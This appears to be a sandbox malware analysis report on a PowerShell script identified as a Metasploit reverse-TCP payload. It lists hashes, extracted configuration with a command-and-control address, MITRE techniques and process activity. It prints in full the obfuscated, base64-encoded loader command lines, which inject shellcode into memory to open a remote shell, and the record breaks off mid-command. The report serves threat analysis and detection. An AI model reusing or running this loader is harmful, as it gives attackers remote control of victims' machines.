metasploit | e8840dd3399e063dd23765bf82067c2f58f03cf3709e84d3dd85ffe99351a303

General

Target

e8840dd3399e063dd23765bf82067c2f58f03cf3709e84d3dd85ffe99351a303.ps1
Size

7KB
MD5

3a857403ef0d05f9cce0527c8f50017e
SHA1

99f5796ce4360edd426b51b6039119e8935237da
SHA256

e8840dd3399e063dd23765bf82067c2f58f03cf3709e84d3dd85ffe99351a303
SHA512

2bd63b530ebe9c0f794517fe2bd5d958c9e20b8d386d40a47162484527db5db078e2f79d3608f1f5526dfeea7635cba4d65e786f046395a996add394a78d1e4e
SSDEEP

192:wk5qvXhjyhwvz2PrrdIbST3nKTwQXh9Le:wkcXhjyhGzudIk3K8QXhI

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

18.158.58.205:17973

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Blocklisted process makes network request 10 IoCs

flow	pid	Process
2	2804	powershell.exe
2	2804	powershell.exe
2	2804	powershell.exe
2	2804	powershell.exe
2	2804	powershell.exe
2	2804	powershell.exe
2	2804	powershell.exe
2	2804	powershell.exe
2	2804	powershell.exe
2	2804	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1768	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1768	powershell.exe
2172	powershell.exe
2132	powershell.exe
2804	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeDebugPrivilege	2172	powershell.exe
Token: SeDebugPrivilege	2132	powershell.exe
Token: SeDebugPrivilege	2804	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1768 wrote to memory of 2172	1768	powershell.exe	32
PID 1768 wrote to memory of 2172	1768	powershell.exe	32
PID 1768 wrote to memory of 2172	1768	powershell.exe	32
PID 2172 wrote to memory of 2132	2172	powershell.exe	33
PID 2172 wrote to memory of 2132	2172	powershell.exe	33
PID 2172 wrote to memory of 2132	2172	powershell.exe	33
PID 2132 wrote to memory of 2804	2132	powershell.exe	34
PID 2132 wrote to memory of 2804	2132	powershell.exe	34
PID 2132 wrote to memory of 2804	2132	powershell.exe	34
PID 2132 wrote to memory of 2804	2132	powershell.exe	34
PID 2804 wrote to memory of 2824	2804	powershell.exe	35
PID 2804 wrote to memory of 2824	2804	powershell.exe	35
PID 2804 wrote to memory of 2824	2804	powershell.exe	35
PID 2804 wrote to memory of 2824	2804	powershell.exe	35
PID 2824 wrote to memory of 2884	2824	csc.exe	36
PID 2824 wrote to memory of 2884	2824	csc.exe	36
PID 2824 wrote to memory of 2884	2824	csc.exe	36
PID 2824 wrote to memory of 2884	2824	csc.exe	36

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\e8840dd3399e063dd23765bf82067c2f58f03cf3709e84d3dd85ffe99351a303.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1768
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -C "sv JG -;sv Hgs ec;sv b ((gv JG).value.toString()+(gv Hgs).value.toString());powershell (gv b).value.toString() 'JABqAFEAUABqACAAPQAgACcAJABvAFYAcQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABvAFYAcQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGEALAAwAHgAYwA1ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiAGIALAAwAHgAYwBkACwAMAB4ADQAZgAsADAAeAA2ADgALAAwAHgAZQA2ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADUAOAAsADAAeAAxADcALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMAAzACwAMAB4ADkANQAsADAAeAA1AGMALAAwAHgAOABhACwAMAB4ADEAMwAsADAAeABkADkALAAwAHgAOABiACwAMAB4AGMANQAsADAAeABkAGMALAAwAHgAMgAxACwAMAB4ADQAYwAsADAAeABiAGEALAAwAHgANQA1ACwAMAB4AGMANAAsADAAeAA3AGQALAAwAHgAZQA4ACwAMAB4ADAAMgAsADAAeAA4AGQALAAwAHgAMgBjACwAMAB4ADMAYwAsADAAeAA0ADAALAAwAHgAYwAzACwAMAB4AGQAYwAsADAAeABiADcALAAwAHgAMAA0ACwAMAB4AGYANwAsADAAeABkADMALAAwAHgANwAwACwAMAB4AGUAMgAsADAAeABkADEALAAwAHgANgAwACwAMAB4ADAAYwAsADAAeABkAGIALAAwAHgAMgBjACwAMAB4ADgAOAAsADAAeABjADAALAAwAHgAZABiACwAMAB4AGUAMgAsADAAeAA0AGEALAAwAHgANAAyACwAMAB4AGEAMAAsADAAeABmADgALAAwAHgAOQBlACwAMAB4AGEANAAsADAAeAA5ADkALAAwAHgAMwAzACwAMAB4AGQAMwAsADAAeABhADUALAAwAHgAZABlACwAMAB4ADgAMgAsADAAeAA5ADkALAAwAHgANABhACwAMAB4AGIAMgAsADAAeAA0ADMALAAwAHgAZQA5ACwAMAB4AGMANwAsADAAeAAyADMALAAwAHgAZQAwACwAMAB4AGEAZgAsADAAeABkAGIALAAwAHgANAAyACwAMAB4ADIANgAsADAAeABhADQALAAwAHgANgA0ACwAMAB4ADMAZAAsADAAeAA0ADMALAAwAHgANwBiACwAMAB4ADEAMAAsADAAeABmADEALAAwAHgANABhACwAMAB4AGEAYwAsADAAeAA4ADkALAAwAHgAOAAyACwAMAB4ADEANAAsADAAeAA2AGMALAAwAHgAMgBiACwAMAB4ADQANgAsADAAeAAyAGYALAAwAHgAMgA0ACwAMAB4ADMAMwAsADAAeABlAGQALAAwAHgAZQA2ACwAMAB4AGMAMQAsADAAeAA3AGYALAAwAHgAZABjACwAMAB4ADAANwAsADAAeAA2ADAALAAwAHgAMABiACwAMAB4ADIAYQAsADAAeAA3AGMALAAwAHgANwAyACwAMAB4AGQAZAAsADAAeAA2ADIALAAwAHgANAAyACwAMAB4AGQAOQAsADAAeAAyADAALAAwAHgANABiACwAMAB4ADQAZgAsADAAeAAyADMALAAwAHgANgA0ACwAMAB4ADYAYwAsADAAeABhAGYALAAwAHgANQA2ACwAMAB4ADkAZQAsADAAeAA4AGUALAAwAHgANQAyACwAMAB4ADYAMQAsADAAeAA2ADUALAAwAHgAZQBjACwAMAB4ADgAOAAsADAAeABlADQALAAwAHgANwBhACwAMAB4ADUANgAsADAAeAA1AGIALAAwAHgANQBlACwAMAB4ADUAZgAsADAAeAA2ADYALAAwAHgAOAA4ACwAMAB4ADMAOQAsADAAeAAxADQALAAwAHgANgA0ACwAMAB4ADYANQAsADAAeAA0AGQALAAwAHgANwAyACwAMAB4ADYAOQAsADAAeAA3ADgALAAwAHgAOAAyACwAMAB4ADAAOAAsADAAeAA5ADUALAAwAHgAZgAxACwAMAB4ADIANQAsADAAeABkAGYALAAwAHgAMQBmACwAMAB4ADQAMQAsADAAeAAwADIALAAwAHgAZgBiACwAMAB4ADQANAAsADAAeAAxADIALAAwAHgAMgBiACwAMAB4ADUAYQAsADAAeAAyADEALAAwAHgAZgA1ACwAMAB4ADUANAAsADAAeABiAGMALAAwAHgAOABkACwAMAB4AGEAYQAsADAAeABmADAALAAwAHgAYgA2ACwAMAB4ADMAYwAsADAAeABiAGQALAAwAHgAOAA1ACwAMAB4ADMANgAsADAAeABiAGYALAAwAHgAYwAyACwAMAB4AGQAYgAsADAAeABhADAALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeABlADQALAAwAHgAMwAwACwAMAB4ADEAYwAsADAAeAAxADkALAAwAHgAOQA3ACwAMAB4ADAAMgAsADAAeAA4ADMALAAwAHgAYgAxACwAMAB4ADMAZgAsADAAeAAyAGYALAAwAHgANABjACwAMAB4ADEAZgAsADAAeABjADcALAAwAHgAMgA2ACwAMAB4ADUAYQAsADAAeABhADAALAAwAHgAMQA3ACwAMAB4ADgAMAAsADAAeAAwAGIALAAwAHgANQBmACwAMAB4ADkAOAAsADAAeABmADEALAAwAHgAMAAyACwAMAB4ADkAYgAsADAAeABjAGMALAAwAHgAYQAxACwAMAB4ADMAYwAsADAAeAAwAGEALAAwAHgANgBkACwAMAB4ADIAYQAsADAAeABiAGQALAAwAHgAYgAzACwAMAB4AGIAOAAsADAAeABjADcALAAwAHgAYgA3ACwAMAB4ADIAMwAsADAAeAA1ADEALAAwAHgAOAA2ACwAMAB4AGYAMgAsADAAeAA3AGUALAAwAHgAMwBkACwAMAB4AGIANAAsADAAeAAwADIALAAwAHgAYwA2ACwAMAB4ADgAYgAsADAAeAAzADEALAAwAHgAZQA0ACwAMAB4ADkANgAsADAAeABhADMALAAwAHgAMQAxACwAMAB4AGIAOQAsADAAeAA1ADYALAAwAHgAMQA0ACwAMAB4AGQAMgAsADAAeAA2ADkALAAwAHgAMwBlACwAMAB4ADcAZQAsADAAeABkAGQALAAwAHgANQA2ACwAMAB4ADUAZQAsADAAeAA4ADEALAAwAHgAMwA3ACwAMAB4AGYAZgAsADAAeABmADQALAAwAHgANgBlACwAMAB4AGUAZQAsADAAeAA1ADcALAAwAHgANgAwACwAMAB4ADEANgAsADAAeABhAGIALAAwAHgAMgBjACwAMAB4ADEAMQAsADAAeABkADcALAAwAHgANgAxACwAMAB4ADQAOQAsADAAeAAxADEALAAwAHgANQAzACwAMAB4ADgANgAsADAAeABhAGQALAAwAHgAZABmACwAMAB4ADkANAAsADAAeABlADMALAAwAHgAYgBkACwAMAB4AGIANwAsADAAeAA1ADQALAAwAHgAYgBlACwAMAB4ADkAYwAsADAAeAAxADEALAAwAHgANgBhACwAMAB4ADEANAAsADAAeAA4AGEALAAwAHgAOQBkACwAMAB4AGYAZQAsADAAeAA5ADMALAAwAHgAMQBkACwAMAB4AGMAYQAsADAAeAA5ADYALAAwAHgAOQA5ACwAMAB4ADcAOAAsADAAeAAzAGMALAAwAHgAMwA5ACwAMAB4ADYAMQAsADAAeABhAGYALAAwAHgAMwA3ACwAMAB4AGYAMAAsADAAeABmADcALAAwAHgAMQAwACwAMAB4ADIAZgAsADAAeABmAGQALAAwAHgAMQA3ACwAMAB4ADkAMQAsADAAeABhAGYALAAwAHgAYQBiACwAMAB4ADcAZAAsADAAeAA5ADEALAAwAHgAYwA3ACwAMAB4ADAAYgAsADAAeAAyADYALAAwAHgAYwAyACwAMAB4AGYAMgAsADAAeAA1ADMALAAwAHgAZgAzACwAMAB4ADcANgAsADAAeABhAGYALAAwAHgAYwAxACwAMAB4AGYAYwAsADAAeAAyAGUALAAwAHgAMQBjACwAMAB4ADQAMQAsADAAeAA5ADUALAAwAHgAYwBjACwAMAB4ADcAYgAsADAAeABhADUALAAwAHgAMwBhACwAMAB4ADIAZQAsADAAeABhAGUALAAwAHgAMwA3ACwAMAB4ADAANgAsADAAeABmADkALAAwAHgAOQA2ACwAMAB4ADQAZAAsADAAeAA2ADYALAAwAHgAMwA5ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABNAHoARwBBAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABNAHoARwBBAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABNAHoARwBBACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAagBRAFAAagApACkAOwAkAFAAQgBVAHoAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQASwBnAGEAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQASwBnAGEAIAAkAFAAQgBVAHoAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAUABCAFUAegAgACQAZQAiADsAfQA='"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2172
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABqAFEAUABqACAAPQAgACcAJABvAFYAcQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABvAFYAcQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGEALAAwAHgAYwA1ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiAGIALAAwAHgAYwBkACwAMAB4ADQAZgAsADAAeAA2ADgALAAwAHgAZQA2ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADUAOAAsADAAeAAxADcALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMAAzACwAMAB4ADkANQAsADAAeAA1AGMALAAwAHgAOABhACwAMAB4ADEAMwAsADAAeABkADkALAAwAHgAOABiACwAMAB4AGMANQAsADAAeABkAGMALAAwAHgAMgAxACwAMAB4ADQAYwAsADAAeABiAGEALAAwAHgANQA1ACwAMAB4AGMANAAsADAAeAA3AGQALAAwAHgAZQA4ACwAMAB4ADAAMgAsADAAeAA4AGQALAAwAHgAMgBjACwAMAB4ADMAYwAsADAAeAA0ADAALAAwAHgAYwAzACwAMAB4AGQAYwAsADAAeABiADcALAAwAHgAMAA0ACwAMAB4AGYANwAsADAAeABkADMALAAwAHgANwAwACwAMAB4AGUAMgAsADAAeABkADEALAAwAHgANgAwACwAMAB4ADAAYwAsADAAeABkAGIALAAwAHgAMgBjACwAMAB4ADgAOAAsADAAeABjADAALAAwAHgAZABiACwAMAB4AGUAMgAsADAAeAA0AGEALAAwAHgANAAyACwAMAB4AGEAMAAsADAAeABmADgALAAwAHgAOQBlACwAMAB4AGEANAAsADAAeAA5ADkALAAwAHgAMwAzACwAMAB4AGQAMwAsADAAeABhADUALAAwAHgAZABlACwAMAB4ADgAMgAsADAAeAA5ADkALAAwAHgANABhACwAMAB4AGIAMgAsADAAeAA0ADMALAAwAHgAZQA5ACwAMAB4AGMANwAsADAAeAAyADMALAAwAHgAZQAwACwAMAB4AGEAZgAsADAAeABkAGIALAAwAHgANAAyACwAMAB4ADIANgAsADAAeABhADQALAAwAHgANgA0ACwAMAB4ADMAZAAsADAAeAA0ADMALAAwAHgANwBiACwAMAB4ADEAMAAsADAAeABmADEALAAwAHgANABhACwAMAB4AGEAYwAsADAAeAA4ADkALAAwAHgAOAAyACwAMAB4ADEANAAsADAAeAA2AGMALAAwAHgAMgBiACwAMAB4ADQANgAsADAAeAAyAGYALAAwAHgAMgA0ACwAMAB4ADMAMwAsADAAeABlAGQALAAwAHgAZQA2ACwAMAB4AGMAMQAsADAAeAA3AGYALAAwAHgAZABjACwAMAB4ADAANwAsADAAeAA2ADAALAAwAHgAMABiACwAMAB4ADIAYQAsADAAeAA3AGMALAAwAHgANwAyACwAMAB4AGQAZAAsADAAeAA2ADIALAAwAHgANAAyACwAMAB4AGQAOQAsADAAeAAyADAALAAwAHgANABiACwAMAB4ADQAZgAsADAAeAAyADMALAAwAHgANgA0ACwAMAB4ADYAYwAsADAAeABhAGYALAAwAHgANQA2ACwAMAB4ADkAZQAsADAAeAA4AGUALAAwAHgANQAyACwAMAB4ADYAMQAsADAAeAA2ADUALAAwAHgAZQBjACwAMAB4ADgAOAAsADAAeABlADQALAAwAHgANwBhACwAMAB4ADUANgAsADAAeAA1AGIALAAwAHgANQBlACwAMAB4ADUAZgAsADAAeAA2ADYALAAwAHgAOAA4ACwAMAB4ADMAOQAsADAAeAAxADQALAAwAHgANgA0ACwAMAB4ADYANQAsADAAeAA0AGQALAAwAHgANwAyACwAMAB4ADYAOQAsADAAeAA3ADgALAAwAHgAOAAyACwAMAB4ADAAOAAsADAAeAA5ADUALAAwAHgAZgAxACwAMAB4ADIANQAsADAAeABkAGYALAAwAHgAMQBmACwAMAB4ADQAMQAsADAAeAAwADIALAAwAHgAZgBiACwAMAB4ADQANAAsADAAeAAxADIALAAwAHgAMgBiACwAMAB4ADUAYQAsADAAeAAyADEALAAwAHgAZgA1ACwAMAB4ADUANAAsADAAeABiAGMALAAwAHgAOABkACwAMAB4AGEAYQAsADAAeABmADAALAAwAHgAYgA2ACwAMAB4ADMAYwAsADAAeABiAGQALAAwAHgAOAA1ACwAMAB4ADMANgAsADAAeABiAGYALAAwAHgAYwAyACwAMAB4AGQAYgAsADAAeABhADAALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeABlADQALAAwAHgAMwAwACwAMAB4ADEAYwAsADAAeAAxADkALAAwAHgAOQA3ACwAMAB4ADAAMgAsADAAeAA4ADMALAAwAHgAYgAxACwAMAB4ADMAZgAsADAAeAAyAGYALAAwAHgANABjACwAMAB4ADEAZgAsADAAeABjADcALAAwAHgAMgA2ACwAMAB4ADUAYQAsADAAeABhADAALAAwAHgAMQA3ACwAMAB4ADgAMAAsADAAeAAwAGIALAAwAHgANQBmACwAMAB4ADkAOAAsADAAeABmADEALAAwAHgAMAAyACwAMAB4ADkAYgAsADAAeABjAGMALAAwAHgAYQAxACwAMAB4ADMAYwAsADAAeAAwAGEALAAwAHgANgBkACwAMAB4ADIAYQAsADAAeABiAGQALAAwAHgAYgAzACwAMAB4AGIAOAAsADAAeABjADcALAAwAHgAYgA3ACwAMAB4ADIAMwAsADAAeAA1ADEALAAwAHgAOAA2ACwAMAB4AGYAMgAsADAAeAA3AGUALAAwAHgAMwBkACwAMAB4AGIANAAsADAAeAAwADIALAAwAHgAYwA2ACwAMAB4ADgAYgAsADAAeAAzADEALAAwAHgAZQA0ACwAMAB4ADkANgAsADAAeABhADMALAAwAHgAMQAxACwAMAB4AGIAOQAsADAAeAA1ADYALAAwAHgAMQA0ACwAMAB4AGQAMgAsADAAeAA2ADkALAAwAHgAMwBlACwAMAB4ADcAZQAsADAAeABkAGQALAAwAHgANQA2ACwAMAB4ADUAZQAsADAAeAA4ADEALAAwAHgAMwA3ACwAMAB4AGYAZgAsADAAeABmADQALAAwAHgANgBlACwAMAB4AGUAZQAsADAAeAA1ADcALAAwAHgANgAwACwAMAB4ADEANgAsADAAeABhAGIALAAwAHgAMgBjACwAMAB4ADEAMQAsADAAeABkADcALAAwAHgANgAxACwAMAB4ADQAOQAsADAAeAAxADEALAAwAHgANQAzACwAMAB4ADgANgAsADAAeABhAGQALAAwAHgAZABmACwAMAB4ADkANAAsADAAeABlADMALAAwAHgAYgBkACwAMAB4AGIANwAsADAAeAA1ADQALAAwAHgAYgBlACwAMAB4ADkAYwAsADAAeAAxADEALAAwAHgANgBhACwAMAB4ADEANAAsADAAeAA4AGEALAAwAHgAOQBkACwAMAB4AGYAZQAsADAAeAA5ADMALAAwAHgAMQBkACwAMAB4AGMAYQAsADAAeAA5ADYALAAwAHgAOQA5ACwAMAB4ADcAOAAsADAAeAAzAGMALAAwAHgAMwA5ACwAMAB4ADYAMQAsADAAeABhAGYALAAwAHgAMwA3ACwAMAB4AGYAMAAsADAAeABmADcALAAwAHgAMQAwACwAMAB4ADIAZgAsADAAeABmAGQALAAwAHgAMQA3ACwAMAB4ADkAMQAsADAAeABhAGYALAAwAHgAYQBiACwAMAB4ADcAZAAsADAAeAA5ADEALAAwAHgAYwA3ACwAMAB4ADAAYgAsADAAeAAyADYALAAwAHgAYwAyACwAMAB4AGYAMgAsADAAeAA1ADMALAAwAHgAZgAzACwAMAB4ADcANgAsADAAeABhAGYALAAwAHgAYwAxACwAMAB4AGYAYwAsADAAeAAyAGUALAAwAHgAMQBjACwAMAB4ADQAMQAsADAAeAA5ADUALAAwAHgAYwBjACwAMAB4ADcAYgAsADAAeABhADUALAAwAHgAMwBhACwAMAB4ADIAZQAsADAAeABhAGUALAAwAHgAMwA3ACwAMAB4ADAANgAsADAAeABmADkALAAwAHgAOQA2ACwAMAB4ADQAZAAsADAAeAA2ADYALAAwAHgAMwA5ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABNAHoARwBBAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABNAHoARwBBAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABNAHoARwBBACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAagBRAFAAagApACkAOwAkAFAAQgBVAHoAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQASwBnAGEAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIg